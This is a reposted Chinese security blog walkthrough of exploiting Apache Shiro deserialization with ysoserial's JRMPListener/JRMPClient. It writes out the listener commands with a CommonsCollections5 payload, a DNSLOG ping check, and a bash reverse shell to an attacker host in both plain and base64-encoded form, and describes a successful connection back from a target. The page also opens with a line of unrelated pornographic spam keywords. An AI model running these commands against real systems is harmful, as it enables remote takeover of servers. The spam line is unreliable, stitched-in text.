一区二区三区三上|欧美在线视频五区|国产午夜无码在线观看视频|亚洲国产裸体网站|无码成年人影视|亚洲AV亚洲AV|成人开心激情五月|欧美性爱内射视频|超碰人人干人人上|一区二区无码三区亚洲人区久久精品

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

使用JRMPClient模塊進(jìn)行測(cè)試

jf_vLt34KHi ? 來源:Tide安全團(tuán)隊(duì) ? 作者:Tide安全團(tuán)隊(duì) ? 2022-11-22 17:22 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

前言

最近在測(cè)試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈,但是發(fā)現(xiàn)存在JRMPClient可用的情況。

b2047198-6a45-11ed-8abf-dac502259ad0.png

換一種工具嘗試

b225dc20-6a45-11ed-8abf-dac502259ad0.png

發(fā)現(xiàn) JRMPClient 可用, 嘗試使用 JRMPClient 進(jìn)行測(cè)試,最終這個(gè)目標(biāo)也沒有執(zhí)行成功所以換了一個(gè)目標(biāo)進(jìn)行的嘗試,僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進(jìn)行測(cè)試

找到一個(gè)同樣存在shiro反序列的目標(biāo)。

b237b030-6a45-11ed-8abf-dac502259ad0.png

同樣find: JRMPClient can be use。

搭建JRMPClient 監(jiān)聽服務(wù)

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務(wù),下載地址:https://github.com/frohoff/ysoserial

使用DNSLOG進(jìn)行檢測(cè)

在不確定目標(biāo)是否通外網(wǎng)的情況下 先使用DNSLOG進(jìn)行檢測(cè) 獲取一個(gè)新的域名 :w3dh1h.dnslog.cn

b24883f6-6a45-11ed-8abf-dac502259ad0.png

VPS上開啟JRMPListener

在VPS上搭建服務(wù)命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

b2716df2-6a45-11ed-8abf-dac502259ad0.png

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務(wù)的地址:

b2887efc-6a45-11ed-8abf-dac502259ad0.png

JRMPListener 收到返回信息

b29c67e6-6a45-11ed-8abf-dac502259ad0.png

DNSLOG上收到目標(biāo)的ping 命令信息 說明目標(biāo)服務(wù)器通外網(wǎng)

b2b75fce-6a45-11ed-8abf-dac502259ad0.png

執(zhí)行反彈命令

執(zhí)行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

b6ba1166-6a45-11ed-8abf-dac502259ad0.png

沒有收到反彈鏈接

b6db2266-6a45-11ed-8abf-dac502259ad0.png

將命令進(jìn)行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

b6f38aae-6a45-11ed-8abf-dac502259ad0.png

成功收到反彈鏈接

b72e021a-6a45-11ed-8abf-dac502259ad0.png

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 模塊
    +關(guān)注

    關(guān)注

    7

    文章

    2788

    瀏覽量

    50346
  • key
    key
    +關(guān)注

    關(guān)注

    0

    文章

    53

    瀏覽量

    13085

原文標(biāo)題:使用JRMPClient模塊進(jìn)行測(cè)試

文章出處:【微信號(hào):Tide安全團(tuán)隊(duì),微信公眾號(hào):Tide安全團(tuán)隊(duì)】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    怎樣對(duì)電源模塊進(jìn)行可靠性測(cè)試

    電源作為電路系統(tǒng)的“心臟”,其重要性是顯而易見的。在選擇電源模塊時(shí),除了要考慮輸入電壓范圍、額定功率、隔離耐壓、效率、紋波&噪聲等性能特性外,還需針對(duì)其高低溫性能和降額設(shè)計(jì)進(jìn)行可靠性測(cè)試。
    的頭像 發(fā)表于 09-25 11:31 ?2w次閱讀
    怎樣對(duì)電源<b class='flag-5'>模塊</b><b class='flag-5'>進(jìn)行</b>可靠性<b class='flag-5'>測(cè)試</b>

    電源模塊生產(chǎn)測(cè)試必備系統(tǒng)

    n 系統(tǒng)簡(jiǎn)介 電源模塊作為電路系統(tǒng)的心臟,它的性能直接影響到整個(gè)電路系統(tǒng)的正常運(yùn)行,因此電源模塊的產(chǎn)品性能就顯得格外重要,對(duì)于一款合格的電源模塊,需要進(jìn)行多項(xiàng)性能參數(shù)的
    發(fā)表于 11-21 17:00 ?1975次閱讀
    電源<b class='flag-5'>模塊</b>生產(chǎn)<b class='flag-5'>測(cè)試</b>必備系統(tǒng)

    對(duì)光模塊進(jìn)行測(cè)試的四大步驟

    模塊是由發(fā)射器和接收器組成。當(dāng)發(fā)射器通過光纖與接收器連接時(shí),如果整個(gè)系統(tǒng)的誤碼率沒有達(dá)到預(yù)期的效果,是發(fā)射器的問題還是接收器的問題?測(cè)試模塊一般分為4個(gè)步驟,主要分為對(duì)發(fā)射器和接收器的測(cè)試
    的頭像 發(fā)表于 12-25 16:27 ?3427次閱讀

    使用示波器對(duì)電源模塊進(jìn)行紋波測(cè)量

      在電源模塊物料檢測(cè)和某些單板測(cè)試時(shí),會(huì)使用示波器對(duì)電源模塊進(jìn)行紋波測(cè)量,所以需要了解電源紋波的產(chǎn)生、危害,以及示波器各種探頭,用哪種探頭測(cè)試
    的頭像 發(fā)表于 01-12 16:35 ?9421次閱讀
    使用示波器對(duì)電源<b class='flag-5'>模塊</b><b class='flag-5'>進(jìn)行</b>紋波測(cè)量

    使用TPT進(jìn)行測(cè)試建模/測(cè)試設(shè)計(jì)

    TPT中的測(cè)試用例用信號(hào)特征和函數(shù)調(diào)用描述被測(cè)系統(tǒng)的刺激。您可以用連續(xù)的測(cè)試步驟對(duì)簡(jiǎn)單的測(cè)試進(jìn)行建模。對(duì)于更復(fù)雜的測(cè)試用例,TPT提供了混合
    的頭像 發(fā)表于 11-25 11:15 ?1412次閱讀
    使用TPT<b class='flag-5'>進(jìn)行</b><b class='flag-5'>測(cè)試</b>建模/<b class='flag-5'>測(cè)試</b>設(shè)計(jì)

    聚焦千兆光模塊和萬兆光模塊測(cè)試技術(shù)及設(shè)備

    本文主要探討了千兆光模塊和萬兆光模塊測(cè)試技術(shù)及測(cè)試設(shè)備,讓讀者了解光模塊測(cè)試的具體方法。同時(shí),
    的頭像 發(fā)表于 11-06 15:00 ?1120次閱讀

    電源自動(dòng)測(cè)試系統(tǒng)如何進(jìn)行電源模塊測(cè)試

    電源自動(dòng)測(cè)試系統(tǒng)如何進(jìn)行電源模塊測(cè)試? 電源自動(dòng)測(cè)試系統(tǒng)是用于對(duì)電源模塊
    的頭像 發(fā)表于 11-09 09:30 ?1378次閱讀

    電源模塊耐壓測(cè)試的標(biāo)準(zhǔn)及其規(guī)范是什么?要如何測(cè)試?

    電源模塊耐壓測(cè)試的標(biāo)準(zhǔn)及其規(guī)范是什么?要如何測(cè)試? 電源模塊是電子設(shè)備中至關(guān)重要的部分,其耐壓測(cè)試是確保產(chǎn)品質(zhì)量和安全性的重要環(huán)節(jié)。在
    的頭像 發(fā)表于 11-10 14:22 ?5678次閱讀

    電源模塊測(cè)試如何對(duì)電源紋波測(cè)試進(jìn)行助力?

    直流電源紋波是什么?直流電源紋波的危害?電源模塊測(cè)試如何對(duì)電源紋波測(cè)試進(jìn)行助力? 直流電源紋波是指直流電源輸出的電壓或電流在時(shí)間上的波動(dòng)。通常情況下,直流電源的輸出不應(yīng)該有波動(dòng),而應(yīng)該
    的頭像 發(fā)表于 11-10 15:33 ?799次閱讀

    利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)模塊進(jìn)行煙霧測(cè)試說明

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)模塊進(jìn)行煙霧測(cè)試說明.pdf》資料免費(fèi)下載
    發(fā)表于 11-22 10:13 ?3次下載
    利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)<b class='flag-5'>模塊</b><b class='flag-5'>進(jìn)行</b>煙霧<b class='flag-5'>測(cè)試</b>說明

    利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)模塊進(jìn)行煙霧測(cè)試

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)模塊進(jìn)行煙霧測(cè)試.pdf》資料免費(fèi)下載
    發(fā)表于 11-23 10:36 ?3次下載
    利用ADPD188BI光學(xué)煙霧和氣霧劑檢測(cè)<b class='flag-5'>模塊</b>來<b class='flag-5'>進(jìn)行</b>煙霧<b class='flag-5'>測(cè)試</b>

    為什么要進(jìn)行模塊測(cè)試?光模塊測(cè)試方案

    為什么要進(jìn)行模塊測(cè)試?光模塊測(cè)試方案 光模塊測(cè)試
    的頭像 發(fā)表于 01-19 11:15 ?2304次閱讀

    如何測(cè)試模塊的性能?需要哪些測(cè)試測(cè)量設(shè)備?

    模塊是一種將電信號(hào)轉(zhuǎn)換為光信號(hào)或?qū)⒐庑盘?hào)轉(zhuǎn)換為電信號(hào)的設(shè)備,它在光通信系統(tǒng)中起著重要的作用。為了保證光模塊的正常工作,我們需要對(duì)其進(jìn)行性能測(cè)試,檢測(cè)其是否符合相關(guān)的標(biāo)準(zhǔn)和規(guī)范。那么,
    的頭像 發(fā)表于 01-30 09:03 ?8337次閱讀
    如何<b class='flag-5'>測(cè)試</b>光<b class='flag-5'>模塊</b>的性能?需要哪些<b class='flag-5'>測(cè)試</b>測(cè)量設(shè)備?

    什么是光模塊中的浪涌測(cè)試

    ,光模塊常常會(huì)遭受到來自外部環(huán)境的各種干擾,其中包括來自電力系統(tǒng)的浪涌電壓。因此,進(jìn)行模塊浪涌測(cè)試對(duì)于確保其穩(wěn)定性和可靠性至關(guān)重要。 浪涌測(cè)試
    的頭像 發(fā)表于 01-31 14:24 ?1288次閱讀

    電源模塊測(cè)試系統(tǒng)精準(zhǔn)測(cè)量:揭秘納米軟件的測(cè)試技術(shù)

    電源測(cè)試系統(tǒng)是針對(duì)精密電源、開關(guān)電源、工業(yè)電源、軍品電源等多種電源模塊特性測(cè)試的ate自動(dòng)化測(cè)試設(shè)備,旨在綜合檢測(cè)電源模塊性能,判斷電源是否
    的頭像 發(fā)表于 09-05 18:47 ?628次閱讀
    電源<b class='flag-5'>模塊</b><b class='flag-5'>測(cè)試</b>系統(tǒng)精準(zhǔn)測(cè)量:揭秘納米軟件的<b class='flag-5'>測(cè)試</b>技術(shù)